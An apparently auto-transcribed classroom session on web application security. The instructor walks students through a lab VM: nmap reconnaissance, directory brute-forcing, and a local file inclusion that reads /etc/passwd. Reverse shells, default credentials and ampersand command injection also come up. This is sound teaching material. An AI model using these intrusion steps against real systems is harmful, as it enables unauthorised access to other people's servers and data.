Thank you, Jason, for reminding me to record. And that's the problem. When I set it up ahead of time, and I forgot to do that for today, I just set it up to auto record. This is my personal meeting ID, it's got to, which actually it's time for me to change that up. I have to manually start it recording. So we are recording. We can share this with people who weren't able to make it in. And today we're going to talk about web application security. And we're going to talk about it for a couple of reasons. Why is web application security such a big deal?
The whole world runs with apps.
All right. The whole world runs with apps. Absolutely. Any other ideas?
Because it's the front door to a big host of confidential and private data.
Front door, for sure. It's the front door to a lot of stuff. You know, another really big thing is, can't really be locked, right? So if you have a FTP server or a telnet server or something else going on, you can just shut that down. You should not have a telnet server going, right? We know that. There's all kinds of open doors that you really shouldn't have running. But your web server, you need that. It does work. So it can't just be turned off. In addition, there are lots of different plugins, apps, custom code. That's all part of the web server ecosystem, and all of those potentially could be avenues for exploitation. And finally, not always run by IT pros. For example, our Canvas, right? The woman who runs Canvas, who does a great job. She's a great Canvas administrator. She's not an IT person, right? That's not her job. That's not what she was hired to do. But yet she manages a web application. So she doesn't necessarily know, and think about all the teachers who are writing, Canvas is actually pretty locked down, but that was an issue with Moodle, is teachers would try to get fancy and put scripts inside their pages, and it was opening up web vulnerabilities, right? So for all these reasons, web applications are a really attractive attack surface. But I think the big one is, you can't lock it down. It has to be open. Yeah. So that to me is the big one. With that being said, let's talk about what a web application looks like, and what the process is. So let's say that this is our web server. And over here we have our client. Another important thing to know when we're getting into web application exploitation, you have to know what a URL is. And we've talked about this in class, but let's kind of review this really quick. http://server.com:/path to page. All right, so that is your URL. What is this part right here, everybody?
Isn't that the protocol?
That is the protocol, right? So that's telling the web browser, hey, send HTTP and expect HTTP. You can put lots of different protocols there. For example, you can put file there and actually browse to your hard drive. So if we do, actually, I haven't done it on Windows in a long time. File. There we go.
It's like your computer does it without you.
So if I do that, right, I can browse to these things. I was actually having this conversation with some other people on a Discord server who are studying for the same cert that I am. And they were talking about how they like to view the output of this command with their browser. So they set up a web server because they didn't realize you can just type the word file there and browse to anything on your hard disk, right? But if we have HTTP, it tells it, all right, you're going to send this to an HTTP, or you're going to be sending and receiving HTTP. It'll typically be HTTP or HTTPS. And then what are we looking at here?
The domain.
The domain and the subdomain. So technically, the domain is .com and the subdomain is server, right? Technically, we don't usually make that distinction.
Okay.
But you could have, it could be, and you are used to seeing www dot. That's a subdomain, and you could have multiple ones. But typically, that's the name that's going to be resolved by the. It's going to be resolved by your DNS server, your domain name server, to give you an IP address, right? And it's also part of the HTTP protocol that's going to get sent to the target, right? Telling it, hey, this is the server I'm interested in. So you could have multiple web servers all running on the same host with the same IP address, but by sending it that name as part of the HTTP, it tells it, oh, you want this. Then you're going to have colon and then your port. We don't normally put that in because by default, HTTP is 80 and HTTPS is
443.
443.
443. Yes, thank you. Usually you only specify it if it's on another port, but in capture the flag, that's actually fairly common, right? That you have to specify the port. And then after that, what is this?
It's not the domain, it's the file path?
It's the file path, exactly, on the server, right? So this is, so that URL, that's the meaning of it. On ye olden days, what would happen is, your client, you would type this into your bar, your client would turn that into a request. What type of request?
Get? No.
Get, exactly. So it puts together the GET request and it sends it to the server. And it has all that information in it. The server receives the GET request and it literally starts looking for that path. Oop, let me click over here. Path to page. And assuming that that path is there, what it would do is it would grab the HTML file. Anybody know if there's no particular file name, like if it doesn't say stuff.html, what is the name of the page that gets sent?
The index?
Index.html is the default, right? So it sends back an OK message, right? With that HTML page that was sitting on the server. So if you guys have ever written HTML or played around with W3 Schools, right, it literally just took that HTML and sent it back. And then the web browser would read the HTML, which stands for Hypertext Markup Language, and it would display the page for you. That is the traditional way that web servers work, right? How do they work now?
Three-way handshake, does that come into play yet or no?
No, we're talking about higher level layers. So the three-way handshake has to happen, right, for the get and OK to happen. But we're ignoring that for now. We're only talking about higher level activity. But what happens on the web server now to give you a page?
Doesn't have to use some kind of like code, like 404 is not there, and
Okay, so that is different. That would be that's the type of response if it doesn't find it or if it's forbidden or that kind of thing. And that's always been the same. But what happens now is pages are no longer static HTML pages, right? So it used to be, let me do HTML example. We'll just go to W3 Schools. And so there used to be a page that had this code in it, and your browser would display it like this, right? That's not what happens anymore. Now, if we Google PHP example, we can go right back to W3 Schools. And now you have this PHP, which is going to echo hello world, right? Or do whatever else it needs to do. So you have some type of dynamic programming language these days. Let me go back here. So nowadays,
is CSS dynamic, or is that just better HTML?
it's just better HTML. So typically you're going to have like a folder called CGI bin, and in that folder are going to be your files, and it depends on what programming language you use. PHP is a very common one. Perl, if it's a really old system. Python is pretty popular. Ruby. But some language will do some stuff to generate the web page. And the reason it does stuff is usually it will also connect to a database. MariaDB or MySQL is a very common one. If it's a Windows machine, MS SQL, right? Let's take the example of, you log into Facebook, right? You go look at Facebook. It doesn't have your web page just sitting there. It has to go run the code, and that code will go and check your ID number and say, okay, Christopher, all right, let's go check Christopher's friends. Okay, let's go check and see what content has Christopher liked in the past. Let's go see what's trending right now. And based on all of that, it will generate a custom web page for you in this moment. Does that make sense? So there's all that code running on the back end. Also, nowadays, you're not just getting HTML, you're just not getting text. You're also getting script. And we're back to W3 Schools. They do everything. Let me do they have just an example? Yeah. So this is an example of how a script is inserted into the web page, and all it does is print hello world, and when you click the button, it calls that. So if I click it, it just prints hello world. Really simple example. But the important thing to understand is there's code running over here and there's code running over here, and both of those are potential attack avenues, right? Both of those could be used for you. The script code, not as much anymore, but you hear about things like cross-site scripting and that type of stuff. That's, attacking the script. Because of the dangers of script, because the script is running on my machine, and I can manipulate it so easily, most of that stuff is locked down pretty well. But there are still, weaknesses in scripts. So this is the process. Your client generates the GET request. It sends it to the web server. The web server fires up whatever PHP, Python, Perl it needs. generates the response, sends it back to you, your computer. If there's a script in it, it will run, that script, and it generates the web page, and your browser displays it for you. Does that make sense, everybody?
Yep.
So you attack the script attacks someone else's client.
I haven't said anything about attacking, Nolan.
Oh,
This is just how web browsing works these days. But does that make sense to everybody? Okay. So when we are attacking a web application, we're really kind of hitting three things. Okay, let me change my color back to black. So first we're looking for, okay, let's talk about this. So our goal, whenever we're trying to do web application exploitation, is to get the server to run our code, right? Which might require get the server to upload our code, right? Or we might be able to just kind of run it directly, depending. But remember, that's our goal. We want to get the server to run our code. Now, what is that code going to be? Any ideas? I'm a bad guy trying to get in.
Shell?
What's that?
Reverse shell?
A reverse shell, right? Or what we call a web shell. Okay, and a web shell is just like a web page where you can run commands on the server. So I want to get a reverse shell or a web shell going, to get access. So I might have to upload it and then run it, or there might be different attacks that allow me to run it directly. But that's my goal. That's what I'm going for. So that's everything I'm looking for. And in order to do that, I'm looking for three things. Oh, I keep doing that. I'm looking for misconfigurations. So I'm looking for things so that the system is working as intended, but they didn't configure it to be as secure as possible. Most common of these, is maybe there is a, they didn't change the default passwords. I was just doing a box the other day and it had Apache Tomcat running on it. Tomcat is a JavaScript, deployment system, and if you Google, Apache Tomcat default credentials, boom, bada, boom, you can just try these, right? So I was able to get into Apache Tomcat as an admin. Now, again, at that point, I don't have access to the machine yet, but I have admin access to Apache Tomcat. So then I have to, Google, how do I upload a file in Apache Tomcat, right? And then I upload it, and then I get it to run. So you're solving it one step at a time. But if I'm looking for misconfigurations, I'm looking for default credentials. I'm looking for web pages that I have access to that I shouldn't. Is there a PHP file called, upload that's there that should be, that I should have to have a, what do you call it? I should have to have a password to get to, but if I just type in the full URL, I can get there, right? Those types of things, misconfigurations. I'm also looking for known exploits. So when we talk about known exploits, we're talking about web applications where somebody has already done a proof of concept that will take advantage of a weakness. So somebody else already figured out, hey, WordPress version 3.2 allows you to do this to upload code, and then you can run it, right? That's a known exploit. So that usually is finding the version of whatever common web software they're using and searching for exploits with that. So if I do, you know, if I just Google WordPress, you know, 3.1 exploit, and this right here explains how to do SQL injection on it, right? That's a known exploit. And then we have unknown exploits. That is going to be some kind of custom code that they've written that I'm able to find that I can take advantage of, right? For example, I was just doing a box the other day, and there was code on there. You know, there was a web page for pinging. Do you guys remember that from the damn vulnerable web server?
Death pinging?
So if you Google, or it's actually damn vulnerable web app ping, there's a ton of different videos and stuff. If you want to play around with web application exploitation, the damn vulnerable web app is a great way to do that because it's by design very vulnerable. And it has built into it a page for you to ping other IP addresses. But what you figure out is if I just put ampersand and then another command, it'll run my commands, right? So that's an example of custom code. That's not like a well-known web application that exists out there. Somebody just wrote a little Python script to ping things. And if you play around with it, you figure out, oh, I can get this to run other commands as well. So that gets a little bit more complicated, unknown exploits. SQL injection is usually going to be an unknown exploit unless they tell you exactly what to put into it, right? So all of our attacks are going to fit into these three categories. Everybody with me? Any questions? Going once?
No, exploits isn't malware, right? Or like, I know that's a weird thing to say, but like,
Exploits what?
would I ever like exploit a website with like malware? Is what I'm trying to get to.
No, malware might be the payload. That might be the code that you're trying to run there.
Oh, okay.
But it wouldn't be the exploit. And much malware, you know, smart malware can identify exploits and take advantage of them. But that's not stuff that you are ever going to be messing with. If we think about it from a CTF perspective, right, it's these three things, right? So either there's a misconfiguration. I find Apache Tomcat, I try default credentials and I get in, right? Or it's a known exploit. I find they're running, you know, Joomla version 2.0. I Google that and I find code that will exploit it. Or it's an unknown exploit. I can find the code to their, you know, to one of their PHP pages. And if I read it carefully, I can figure out a way to get it to do like a remote or a local file inclusion, right? For CTF, it's going to be one of those three things. Everybody with me? Other questions? All right, let's go ahead and start up our VirtualBox. I'm going to go ahead again, Javier, and make you co-host. Because I have to close my participants window. So if I miss it, if you see anybody show up, Javier, go ahead and let them in. Let me go ahead and let me import an appliance. And first I'm going to import my Kali Linux, my new one. And I'm just going to machine-based folder, VirtualBox VMs. That's right. I'm going to say yes. I agree to their GPL license. Do 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 do. Because the other Kali I have is kind of old, which isn't bad. And actually, I found it really handy to have an old version of Kali because sometimes as stuff gets updated, it actually breaks things. So there's some things you can do with an old version that you can't do with the up-to-date version. All right. So this is the one. Let me go ahead and I'm going to import the other one. Import appliance. And now I want to import my Hemisphere, which is the one I asked you guys to download. What I don't know is do they have this one set up with a static IP address?
Or what was that?
The Hemisphere. I don't know if they have it set up with
It's DHCP.
DHCP. Okay, good. All right. All right. So now I got both machines. Let me go ahead and I'm going to do a headless start for Gemini. So that's if you do a headless start, it starts it up, but it doesn't open a window.
So
What?
I would. Oh, I don't know what that's all about, but what I did was I created a NAT network and then put them both on the NAT network.
Okay. Well, we can do that. Let's look at.
Because I think it comes by default, it's set to bridge.
Yeah. Network operation. It's been a while since I played with.
I think, yeah, no, not the, I don't, that's host. So go
Okay.
into like, I think you go into the settings of the, yeah, go to network. And then change to,
The NAT network.
yeah. Okay, now I gotta remember where I found the.
Yeah, see, that's where I think. Yeah, 'cause I forget this too. I think I need to create.
It might be in preferences, but it's not that.
Yeah.
Yeah, it's not there. That's different. Network.
Yeah, there you're all right, and that is one of the frustrating things is that you have to create it there.
Yeah.
And I'm going to call this Kali Tech Network, and it has DHCP, and I'm going to click OK. Going to click OK. So now when I go to my Kali box and I click on Settings, if I go to Network, now I can choose NAT network. Hopefully I don't have to change this.
I didn't have to change any of that.
Click OK. Let me start up the Kali box normally. All right, USB controller issue. Which those of you guys who've done this with me in the past, that's not uncommon. So I go to USB. I'm going to disable the USB controller. Click OK. Start it up. These are common things that you run into when you're, playing around with virtual machines. You just got to kind of keep tweaking till you get it to work. All right, and it is working. Let that start up. So while that's starting up, let me go ahead and try a headless start.
I would change the network settings on it.
Oh, that's right. Thank you. So we'll go to Hemisphere and we'll go to Network. And we will change it to a NAT network and click OK. See if it starts or if it grumbles. Seems to have started. Yeah, it says it's running. All right. Let me go ahead and. Now, this is one thing that I really prefer about mostly VirtualBox and VMware. They're the same. But getting the view right.
I think you might have to install the tools.
Switch. Now,
Okay.
scaled mode does it. It's
Oh.
yeah. But if I do that, then we get that. So you have to. It does look a little wonky. And I do remember back in the day, scaled mode. Sometimes you would click, and you're actually clicking like 2 or 3 pixels to the left of where you think you're clicking. I remember running it out. All right, and the default is Kali Kali. And what's the first thing I should do when I get in?
Change the password.
Change the password. Always change the password. It doesn't really matter if you're just kind of doing stuff on your own vulnerable machines, like I am right now, but it's a good habit. And if you ever connect to like Hack the Box or Try Hack Me or any of that stuff, remember the other people can see your box, right? So they can see your Kali box. So if you have the default, I should also change the SSH keys if they have them. It's just good practice. But for right now, I'm just going to say SWD. And not a great password, but different from the default. Okay. So what do I need to do first?
Scan the network. Find the IP address.
Gotta find them, right? Gotta find them. So how do I do that?
And map. Well, first find out your IP address.
So my IP address is 10.0.2.15. It's highly likely that they're like 16, right? And I could do ping 10.0.2.16.
Yeah, that wasn't the case in mine.
Okay. So I could just ping a bunch of addresses. I could write a short script, but Nmap does it automatically. And if I didn't know which particular Nmap commands to use, Nmap, I could search for ping in here. And we see here that the -SN option will disable port scan. So it's just pinging different machines. The opposite is the -PN, which doesn't ping them. So I could do nmap -SN and then define my network 10.0. Because my IP address is /24 0/20. I think it'll take it like this.
Yep.
Okay, so it found 3 other addresses, right? What the most correct answer would be do a port scan on those 3 addresses now. .1, .2, and .4, right? That's the most correct. I'm going to cheat and just open my web browser. Well, this is weird. My web browser is different. They updated it. All right, but I'm just going to go to 10.0.2. 10.0.2.1, and I get nothing. 10.0.2.2. And accept risk and continue. We'll come back to that. .4.
Get rid of the S.
Oh. Okay, so this looks like it's the correct one, right? So 10.0.2.4 is the address of our target. Everybody with me?
Yep.
Took only 45 minutes to get here, but that's okay. You know, I was just having this conversation with somebody the other day. They were like, "Oh, I don't know, man. It's taking me forever to crack these boxes." You know, it takes as long as it takes, and the idea shouldn't be, "Oh, you know what? I'm going to go crack 8 boxes today, or I'm going to go, you know, do 5 CTFs challenges." It should be the process. I'm going to spend, you know, 2 or 3 hours doing this. So we're here. Let me go ahead and that's the invite to this. I'm going to use this. Notes. And let's do, you guys can read that okay, right?
Yep.
All right. So what were the 3 things that we're looking for?
You say like misconfigurations or something?
Misconfigurations?
Web.
Known exploits or unknown exploits?
Yeah.
Right? And the process is the same. We're just kind of following the process. But those are the 3 things that we're looking for. For misconfigurations or known exploits, I need to know what web applications they're using, right? Are they using WordPress? Are they using plugins? Are they using Joomla, right? What is the web? Because I don't know all the web applications, so I got to know what it is so I can go see what they're using. If it's going to be an unknown configuration, I have to see the code. So usually there'll be like an FTP open, that kind of thing. So we should do a scan of our target first with Nmap, right? That should be kind of the first step. And I'm going to tell you, I'm going to do top ports equals 1000. 0.2.4. So if you do top ports, it's only looking at the most common ports. Now, there's a lot of times this will not take you to where you need to go because you might have a web server that's on an uncommon port. But I want to do this quickly, right? So what do they got going on? Well, they have, anybody know what this is?
SMB.
SMB, right? Well, it's Samba on Linux. It's shared drives on Windows, right? I haven't determined yet whether this is a Windows or a Linux machine, but that could tell me. SSH, very rarely will SSH be your entry point. And FTP. If you see FTP and if it allows anonymous access, then usually that means it's like again, this is a CTF thing. It means it is an unknown web exploit because I have to go look at the code so I can figure out, oh, here's a way I can trick it into doing something they don't want it to do. So we'll check that out too. And then obviously HTTP, right? So now I know what ports are open. Now I'm going to do an in-depth scan on all of them. So I'm going to do, I'm going to do Nmap -A for all. So that's going to do an in-depth scan. It's going to do advanced stuff. It's going to try to find versions for me. And normally that takes a very long time, but there's only 5 ports that I'm interested in. So I'm going to specify the ports 21, 22, 80, 139, 445. And 10.0.2.4. So now I'm doing an in-depth scan on those 5 ports. So it's grabbing headers, it's comparing this to other versions. I don't think this will do the vulnerability scan, but it's going to be gathering a lot of information. It should check FTP to see if we can do anonymous login. So the OS discovery is a little contradictory. I'm going to say if it says this is a Debian server running Samba. Yeah, and it's a work group. It's not part of a domain. The web server, it tells me what version of Apache it's running. It tells me the version of OpenSSH that it's running. SSH is rarely going to be your entry point. And it tells me what version of FTP it's running. It's running 3.0.3. It didn't check for anonymous login. So let me try FTP 10.0.2.4 and try anonymous. Did I spell that right? Can we check that for me really quick? Nobody can find it.
I'm missing a Y.
It's a non-EMA mouse. Is that right?
Yeah, that's right.
Okay. Okay. It does not allow anonymous logins, so that's not a way in. Which means it's probably not a like a unknown exploit that I have to figure out, because I have to see their, unless there's some other way to look at their code, right? So it looks like, based upon this, I could also try to, I could try to get some information out of Samba. So I could do SMB client -L. Oop. I think it's like that. 10.0.2.4. So this just tells me that there are 2 different shares, and neither of those are file shares. So this shares printers, and IPC is like remote process communication. You're never going to find anything there. If this had like a share name like Bob's Web Files, that would tell me, okay, I'm supposed to get in through Samba. Let me undo full screen. I don't want that full screen. All right, so we've kind of narrowed things down. We're pretty sure that this is how I'm supposed to get in, right, through this web application. And what is my rule, everybody?
Do the easiest thing first.
Do the easiest thing first. Now, the easiest thing is view source. And I'm looking for things like, there might be flags directly in it. It might have passwords in it. It might have notes. The next easiest thing is going to be examine element, right? And that's getting into the browser stuff, okay? The third thing is going to be a dir derb search, right? Where it will kind of try a bunch of different directories, okay? Related to that, I can scan with nmap vuln scan again. And then finally, I can, keep digging. Wait, actually, no. Before keeping digging, I can start with Burp Suite. Right. So this is kind of in the order of easiness. Now, these two are lower down on the list because when you're doing capture the flags and things like that, that's not going to tell you what you need ever. It's never going to be there. Because in a capture the flag event, I've posted the server and you're sharing the server with 100 other people. If everybody's running derb search, that is, they're trying every possible directory, then that machine's going to go down really fast. So that's never the answer, okay? However, when you have these vulnhub machines, that is a useful technique. Or if you're doing something like the hack the box paid or the try hack me paid, then that might be useful. And because that one takes time, I'm going to start with that one. Vince mentioned robots.txt, which is another useful place to check. And in this case, it tells us, hey, here are, so robots.txt is a file that you put in your web page directory that tells robots, mostly like the Google web crawler, hey, don't look in here. I don't want you to search here, right? So obviously there are 3 directories where they don't want us to search. So this has been very fruitful. And we're going to look at all of those. But right now, I want to start my derb search. Actually, we'll do nmap first. Nmap.
Professor.
Yes.
So you mentioned that for CTS, like usually derb isn't good because, like 1,000 people would be derbing that site. But in in NCL, there's that like the hidden treasures type challenge. So that one's
yeah, and they'll
thing,
tell
right?
you if they want you to use that, right?
Oh, I gotcha.
Yeah, they'll tell you. But not every single machine is set up to handle that kind of load. What always cracks me up is, so if you ever do like a hack the box and you get stuck, they have forums where people discuss the boxes, and the official forums, there's no spoilers or anything. It's kind of nice. But what's funny is, because it's all in order. So you start at the beginning of it, and it's right when the box drops, you have a bunch of people trying to get what's called first blood. So if you're the first person to crack a hack the box, you get first blood. And that goes up on your, it's a nice, little badge there. So everybody's trying to get that. And the first page of every single machine of the forum is just, can you get in? I can't get in. Can anybody get in? I can't get in. And it's because everybody's trying to derb the box at the same time. So that would be a, most CTFs, you shouldn't be doing that. So this was, what I did right here is I ran the vulnerable scripts from nmap, and it only does the ones that are appropriate for HTTP, and it's telling you, okay, there is a robots.txt file, there is a readme.txt file, there's an images directory. So it did a little bit of directory testing for us. And then it tried to check for some automatic file uploads, didn't find them. Internal IP is leaked. Now that internal IP is not useful to us at all. But if this web page, if this server had multiple interfaces, it was connected to another network, that might be useful. And then it gives me a bunch of pages where there are possible SQL injections. So I could check all those. So, some useful information right off the bat. I'll readme.txt. Let me go back here. And again, 10.2.4. Let's check out the readme.txt. Is this useful?
Well, it gives you information about the farm, farmspree.io.
Um,
Tells you alpha by HTML5 up.
This is useful because this tells me, hey, this is a known product out there. So I can Google that. Oh, what the hell is that? Right, and I can start going through this list right here, right? So I can start looking for possible. So that's very useful. So README, right? I haven't even done anything yet, and this is where people. This is the part that people skip. So they go right to. Let me click here. You know, let me click here. Let me see what what I can get to over here. Right. You know, they go right into trying to do things to the code, you know, without actually kind of doing a little bit of research around it. So with that being said, while we're doing other stuff, I'm going to go ahead and start Derb. Oop. 10.0.2.4. And Derb has a ton of different options. I can specify Word files and everything. Usually, I just want to kind of run it by itself. Oh, it found assets. It found images. Actually, so it used this word list. I can do more if I do -w/user share word list. So there's Derb and Derb Buster. I usually use the Derb Buster lists. There's also a ton of other word lists out there. I can use wfuzz. And let's do directory list. Oh, Jesus. I didn't even realize that I can up and down arrow to complete. This is like those fancy, this is a fancy new Z terminal or Z shell. I don't like this stuff, but we're going to do this anyways. Boom, let that run. So this is finding things for us right now. And we'll let that go for a few minutes while we poke around manually, particularly at these things right here. So secret admin LOL. Let's take a look at, and there's nothing there.
I think they're red herrings.
Could be. But it's easy to check. Yeah, so it looks like robots.txt didn't give us anything useful, right? Let's see. So Derb found images. Okay, so these are the images that we would see. Now, this also tells us that at least some of these directories allow us to browse the the directories directly, which is a bad configuration setup. Let's check assets. Again, we can go through assets. We can look at the JavaScript here. We can look at their CSS, which has its own images. Web fonts, probably not anything super useful here. So let's go back to Derb. Did it find anything else? Assets, images. So it doesn't look like it found anything else, right? What should we do now?
Did you go through all the stuff that you said, Professor, like view source, examine element?
We haven't done any of that. This is all just the easy stuff that popped up from us doing what I call due diligence. We haven't, you know, and I did start my Derb scan early, right? Because I thought it would take longer. But now I'm realizing that's right. I'm on the same network, you know, so it can respond to the requests really fast. So I haven't even looked at the source code yet. So let's go ahead and view page source. And gives us the title, header. Now, this is the thing. For web application exploitation, you don't need to be an expert in HTML or any of these other languages, but you should be able to look for things that are outside of the normal. You should be able to identify things like a comment. So this is the banner, the main page. So this is all just defining what things look like. I haven't seen any content yet. Yeah. Icon brands. And then these are the scripts that they're calling down here. Now, sometimes checking out those scripts would be useful, and we can look at them all because we have access to that directory. But I'm going to tell you, very rarely in CTFs do they expect you to examine the JavaScript, unless they kind of tell you to look at the JavaScript. And we can also see it other ways as well, although we have an easy one. All right, so this kind of tells us what we're not getting a lot out of viewing that source. Let's go ahead and inspect element. Now, when you inspect the element, it kind of highlights that one thing that you were looking at. And this, let me move this up. So if I click on different things, it'll kind of show you over here to the right where physically I'm clicking. This is, you know, we can look at the HTML by doing view source. We don't need it for this. Mostly, we might want to play around with the console. We might want to check out the network. We might want to check out, not the style editor, where's storage? There we go. Storage, because we want to see if it sends a cookie back and forth, right? This is kind of a weak version of the Burp Suite, right? That's mostly what we're using it for. The Burp Suite would be better, but this will be fine for what we're doing. Let me just go ahead and click on reload. So we see some stuff go across the network. And we can see, okay, this was our original GET request. And when I click on it, it tells me I requested the root file, right? It tells me what it transferred, how big it was. These are the headers of the response. So it's an OK message response. All the information in there. Does any of this stuff look familiar to you guys? You know where you would have seen that before?
It looks like a Wireshark.
Exactly. This is so Wireshark is set up to do this for anything, but you know, this, you can see the same information for this particular browsing session. And then cookies, if there are any cookies involved, there's no cookies. No parameters for the request. A preview of what the web page looks like. So that's what that gets you. And then I can, once I get the web page, well, then it has all those down at the bottom, all these JavaScript files it has to get. So that's what this is at. So once it gets a web page, it's like, oh, I have to get, you know, pictures that it links out to. I have to get the JavaScript. So it downloads all that stuff right here. So even if I couldn't access the JavaScript directly, which I can look here and see the JavaScript functions. Now, that's not easy. When you start looking at the JavaScript, you've gone kind of beyond getting through easy stuff. But I could be going through that. And then CSS, again, is just going to be how it looks. And then it asks for a bunch of pictures. I couldn't get the favicon, apparently. But most of these, it seemed to respond. Oh, anybody know what 304 is?
Redirect, maybe?
Good guess.
Or moved?
304 means that I don't need to get it again because I already have it. So if you've cached the pictures, it's going to say, hey, this is the version I have. Does it match? And the web server will say 304 not modified, rather than make you download the images again. So yeah, that's what that means, that this hasn't been modified. So I'm not getting a lot of information here. Let me go to memory. I don't really see anything. Let me go back to storage. There we go. And there's no cookies, right? Which was the other thing that I'm looking for. So I don't have any post information. So I can't alter something that I'm sending. So I don't have a cookie and I don't have anything I'm posting to it. So there's no way for me to alter what I'm giving to it. Which means Burp Suite is probably not going to be useful. Burp Suite, what Burp Suite does is it allows you to set up a proxy between you and the web server, and you can stop stuff as it goes back and forth and change it before you send it to the web server. Since I'm not really sending it anything except for regular requests, not posting any information, don't have a cookie, anything like that, Burp Suite's not going to help me. So what do I do? What's it say to do?
I give up.
That's not what it says.
Keep digging?
Keep digging, right? And we keep digging by either Googling what we've identified. So far what we've identified is alpha by HTML, right? That's what we've identified. Or by derbing more, right? So I can I can try other lists, right? I can try, that's right, you know, I can try the Apache. So I can keep searching and searching and searching and searching with derb. That's not usually going to be the best route, but that's the way I can do it. Or I can, we already started our Google search, right? Here's the web page. Now this does not contain the exploit. Well, what's this? But this says CMS little. So this is a local file inclusion vulnerability. And we can, so I would read this. I would say, does this apply? I don't know that it applies, but it came up in my search, right? This explains, you know, where you can get CMS little or CMS light. So does alpha up use CMS light? Let me go ahead and go to that page.
That looks familiar.
So I can actually download alpha right now. I can go to it. Let me open it. Okay, so this is the README. This is the license. Here are some web pages that are there. So let's see, did they change any of that? So if I go back to this, if I change this to index.html, gives me what I expect. If I go to, what was the other one?
Generic
Generic.html.
elements in context.
Generic.html. Okay. That's there. So it seems like this is a default install. And because I can download it, well, now I can kind of comb through and see, is there anything interesting here? Images, same images, assets. This looks the same. Contact. So here's a way I can do something. Let's see. Let's check out contact.html. So what I could do is at this point, inspect element. Let me just fill in with random numbers and see what gets a. Oop. Why is it doing that? B, C, D, and click. Let me go to network over here and click send message. Oh, it's making me do a real b@b.com. Send a message. Okay, we got a post. That's something. I sent something over there. And then it just gives me back my page. Okay, so I could comb through that a little bit. That might be interesting. I don't see anything that says, where was I? CMS Lite. I don't see anything that says that. But let me go ahead and try, you know, since it's easy. We can copy that and see what happens if I paste that in. Let me go to here to see what happens. And it tells me not requested. But can I do anything with this? Now, it doesn't seem like index.php is working. Yeah, so it seems like index.php is not there. So this is not getting me what I want. Jason, you about to say something?
Yeah, like if you go to go back to the web page and go to the portal page.
Go
Yeah.
back to the target page.
Yeah, and change index.php to portal. Capital P, or I don't think it matters. But that was
Okay,
one of the, that's one of the directories I think that came up when we did a derb search.
Really? And I just totally missed that?
Either that or, well, it came up in my search.
Really? What, were you using derb?
I used FF.
You used what?
FF,
Spell it.
FFUF. And
Huh.
I found the same thing when I used dir search.
Okay. dir search is one that I use quite a bit, but this is a new machine I don't have installed. So that's interesting. So
What word list did you use, Jason?
I used the directory, common directories medium. FUP is really fast.
so yeah, derb is not the fastest. So you used which one here?
Go under dirbuster
Okay.
and then directory list 2.3 medium.tech.
I thought we did that one. Directory. Come on. Directory dash list. I think you're doing it. That is interesting. Because am I not seeing it?
No, let me double check let me look at my command and see if I still have it up here.
No, it said found 3, and so it was server status, robots, and the README. So I think it's not looking for directories, is it?
No, it's finding like assets. So it's finding these.
Can you grep that medium for portal? Maybe it's
I
not
see what you're
there.
saying. Grep.
Let me see if it comes up here.
There's portal all caps. There it is.
You found it?
I found it.
It's in the list, but derb didn't find it.
So I wonder if derb is having a hard time because it's going too fast. Like it's not waiting long enough to get a response. So maybe derb is just a bad one. See, do I have a GoBuster on this? So this brings up a good point, which is have the right tools. Derb is an easy tool because it's already there. Jason mentioned FFUF. I'm not familiar with that one, dir search is my preferred one. And then GoBuster is another one that's out there. Each of those, though, requires you to install them. Dir search, I don't remember. Let's see.
There's a GitHub,
Apt install.
or it might, yeah, it might.
Yeah, so no, you have to get it from GitHub. And I do have it, dir search on my other one. So that's interesting. The other way, let's try dirbuster. And http://10.0.2.4, right? And let's browse to user share word lists. Dirbuster. So dirbuster is a graphical one and it's multi-threaded. And I think, oh, you know what? Another thing. Let me just stop.
I think it's doing recursive.
Yeah, because that's the other thing is don't do it. Typically, I tell people don't do it recursively when you first run it. And this is also checking for PHP files. So hopefully this one comes up with it. But yeah, see, this one's taking a lot longer than Derb. Oh, crap. You know what? Oy. I get my commands confused. I'm telling it -w. It thinks -w is the word list file because it's URL then the word list file. So it was never using that whole word list. That's why it was going so fast. So I should also put on here,
It doesn't have a switch, right?
don't be stupid. Because it expects the URL, then the word list file, right? If I don't give it a word list file, it, you know, and after that options. So whatever comes after the URL base, it treats as the word list file. There was none, so it just started using its default list, which is much smaller. So,
There's a way to make that go faster, but
there we go. See, it
There
found
we
it here. All right, and it found index.php. Okay, so portal and index.php. All right, what do we do now?
view source.
We do the same process all over again. Let's take a look at the view page source. So it's telling you it's calling it. Oh. Look at this page. Actually, like I said, I haven't done this one before. I don't know whether we're about to find something interesting, but there's something on here that I would want to take a look at. Let me go use the bathroom real quick. See if you can see what I see. Okay. You guys figure out what's interesting? Is anybody there? Do you guys all go to the bathroom too?
I think you can do local file inclusion.
So
Yeah. So the view about us.html, so you can change that to whatever. So
Let's try.
It's relative.
Let's
But
try.
it'll probably display the raw.
So what he's talking about is, and again, this goes down to understanding what is in the URL. Let me hit enter. So this doesn't show you the HTTP anymore. This is the server, and this is the path. Under portal, there's a PHP file called index.php. So that is the what do you call it? That is the PHP file that's going to generate a web page for you. If you have options to send to the PHP file, there's going to be a question mark, the name. Ooh, I didn't want to do that. Then there is the name of the variable, which in this case is view, equals, and then whatever you want to set it to. So in this case, I'm saying, hey, index.php, this is the file I want to show you, right? That's what I wanted. So that is dangerous. It should, now ideally, if whoever wrote this code should have only a finite set of things that they accept. And actually the best way to do it is it should be a number. View 1, view 2, view 3, and then index.php should have code that says, oh, 1, that's the about us page. Because I can put anything here. And what I might put is, actually, let me go back. Let me see. That's not what I wanted. What I wanted. That's not what I wanted. Okay. Let's try this. Let's see if that gets us anything. Ooh. If I paste that in there. It doesn't.
It's not a Windows machine though.
Okay, let's try etc/passwd.
Bingo.
So I am right now viewing the password file for this machine, which means I know every user on this machine, and I know who I want to try to pretend to be. William. God, I hate William. Let's see if I can get restricted files. Let's see if I can get shadow.
No.
I cannot. So that is called local file inclusion. That's a very common type of error where, the system, again, because it's just a computer, right? It has this way of sending itself a file path. And if I give it something it doesn't expect, because there's nothing sanitizing it, right? I can send it to other places. So I can basically anything on this machine that is world readable, I can read. Yeah, that's called local file inclusion because I can include anything on that machine. It still checks permissions, but I can include anything on the machine. What is the other type of attack that's related to that?
Remote file inclusion.
Remote file inclusion. So remote file inclusion would be, let's see if I can find a, I don't know if this would work. We can try it. Actually, you know what? That won't work because they're not on the same. So it would have to be my machine. So let me go here. Let me do file, new tab. Let me do echo hello world test.html. Now, How do we set up an instant web server on Kali?
Python.
